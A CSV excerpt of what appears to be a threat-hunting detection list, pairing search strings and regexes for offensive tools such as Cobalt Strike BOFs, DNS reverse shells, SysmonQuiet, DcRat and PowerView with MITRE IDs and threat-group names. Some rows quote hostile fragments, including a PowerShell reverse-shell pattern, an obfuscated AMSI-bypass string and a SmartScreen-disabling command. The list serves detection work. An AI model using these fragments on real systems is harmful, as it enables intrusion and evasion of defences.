BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","60748"
"*syscalls_shinject *",".{0,1000}syscalls_shinject\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","0","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","60749"
"*syscalls_shspawn *",".{0,1000}syscalls_shspawn\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","0","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","60750"
"*syscalls_spawn *",".{0,1000}syscalls_spawn\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","0","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","60751"
"*syscalls_spawn.*",".{0,1000}syscalls_spawn\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","60752"
"*syscallsapcspawn.x64*",".{0,1000}syscallsapcspawn\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","60753"
"*syscalls-asm.h*",".{0,1000}syscalls\-asm\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","N/A","10","10","315","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z","60754"
"*syscallsdump.x64*",".{0,1000}syscallsdump\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","60755"
"*syscallsinject.x64*",".{0,1000}syscallsinject\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","60756"
"*syscallsspawn.x64*",".{0,1000}syscallsspawn\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","60757"
"*syscallStuff.asm*",".{0,1000}syscallStuff\.asm.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","N/A","10","3","292","47","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z","60758"
"*sysdream/chashell*",".{0,1000}sysdream\/chashell.{0,1000}","offensive_tool_keyword","chashell","Chashell is a Go reverse shell that communicates over DNS. It can be used to bypass firewalls or tightly restricted networks","T1071.004 - T1572 - T1071 - T1027","TA0011 - TA0005 - TA0008","N/A","PYSA","C2","https://github.com/sysdream/chashell","1","1","N/A","N/A","10","10","1068","135","2022-04-05T17:22:14Z","2019-02-15T14:54:48Z","60760"
"*sysdream/ligolo*",".{0,1000}sysdream\/ligolo.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","1","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","60761"
"*SYSKEY RESET!\nNow please set new administrator password!*",".{0,1000}SYSKEY\sRESET!\\nNow\splease\sset\snew\sadministrator\spassword!.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","60762"
"*Sysmon is being suffocated*",".{0,1000}Sysmon\sis\sbeing\ssuffocated.{0,1000}","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","0","N/A","N/A","N/A","1","88","16","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z","60764"
"*Sysmon is quiet now!*",".{0,1000}Sysmon\sis\squiet\snow!.{0,1000}","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","0","#content","N/A","N/A","1","88","16","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z","60765"
"*sysmonquiet.*",".{0,1000}sysmonquiet\..{0,1000}","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","1","N/A","N/A","N/A","1","88","16","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z","60766"
"*SysmonQuiet-main*",".{0,1000}SysmonQuiet\-main.{0,1000}","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","1","N/A","N/A","N/A","1","88","16","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z","60767"
"*SySS-Research/Seth*",".{0,1000}SySS\-Research\/Seth.{0,1000}","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","1","N/A","N/A","9","10","1423","323","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z","60769"
"*System' EnableSmartScreen 0 -Type Dword -Force -ea 0*",".{0,1000}System\'\sEnableSmartScreen\s0\s\-Type\sDword\s\-Force\s\-ea\s0.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#registry","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","60770"
"*system rm -f /current/tmp/ftshell.latest*",".{0,1000}system\srm\s\-f\s\/current\/tmp\/ftshell\.latest.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z","60771"
"*System token is copied to the current process. Executing cmd.exe..*",".{0,1000}System\stoken\sis\scopied\sto\sthe\scurrent\sprocess\.\sExecuting\scmd\.exe\.\..{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","0","N/A","N/A","10","2","192","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z","60772"
"*system(""/tmp/sh"")*",".{0,1000}system\(\""\/tmp\/sh\""\).{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006?","N/A","N/A","Privilege Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","0","#linux","N/A","10","6","595","148","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z","60773"
"*System.DirectoryServices.AccountManagement.GroupPrincipal*FindByIdentity*D",".{0,1000}System\.DirectoryServices\.AccountManagement\.GroupPrincipal.{0,1000}FindByIdentity.{0,1000}D","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration - domain admins","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","60774"
"*System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $UserSPN*",".{0,1000}System\.IdentityModel\.Tokens\.KerberosRequestorSecurityToken\s\-ArgumentList\s\$UserSPN.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","#content","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","60775"
"*'System.Ma'+'nag'+'eme'+'nt.Autom'+'ation.A'+'ms'+'iU'+'ti'+'ls'*",".{0,1000}\'System\.Ma\'\+\'nag\'\+\'eme\'\+\'nt\.Autom\'\+\'ation\.A\'\+\'ms\'\+\'iU\'\+\'ti\'\+\'ls\'.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","0","N/A","N/A","10","10","1890","311","2024-11-28T10:31:15Z","2019-05-14T06:09:25Z","60777"
"*System.Net.$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(*",".{0,1000}System\.Net\.\$\(\[Text\.Encoding\]\:\:Unicode\.GetString\(\[Convert\]\:\:FromBase64String\(.{0,1000}","offensive_tool_keyword","ShellPwnsh","Reverse Shell in Golang and PowerShell Fud","T1059.001 - T1573.002 - T1105","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/BlackShell256/ShellPwnsh","1","0","N/A","N/A","9","10","9","6","2022-05-01T08:42:54Z","2022-04-28T01:26:08Z","60778"
"*System.Net.Sockets.TCPClient*GetStream()*iex*Out-String*",".{0,1000}System\.Net\.Sockets\.TCPClient.{0,1000}GetStream\(\).{0,1000}iex.{0,1000}Out\-String.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","60779"
"*SYSTEM\CurrentControlSet\Services\dcrypt*",".{0,1000}SYSTEM\\CurrentControlSet\\Services\\dcrypt.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","#registry","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","60780"
"*SYSTEM\CurrentControlSet\Services\procexp*",".{0,1000}SYSTEM\\CurrentControlSet\\Services\\procexp.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privledged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Persistence","https://github.com/trustedsec/The_Shelf","1","0","#registry #servicename","ServiceName","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","60781"
"*System32fileWritePermissions.txt*",".{0,1000}System32fileWritePermissions\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","60782"
"*systemctl disable IMDS*",".{0,1000}systemctl\sdisable\sIMDS.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","N/A","8","2","101","3","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z","60787"
"*systemctl enable IMDS*",".{0,1000}systemctl\senable\sIMDS.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","N/A","8","2","101","3","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z","60789"
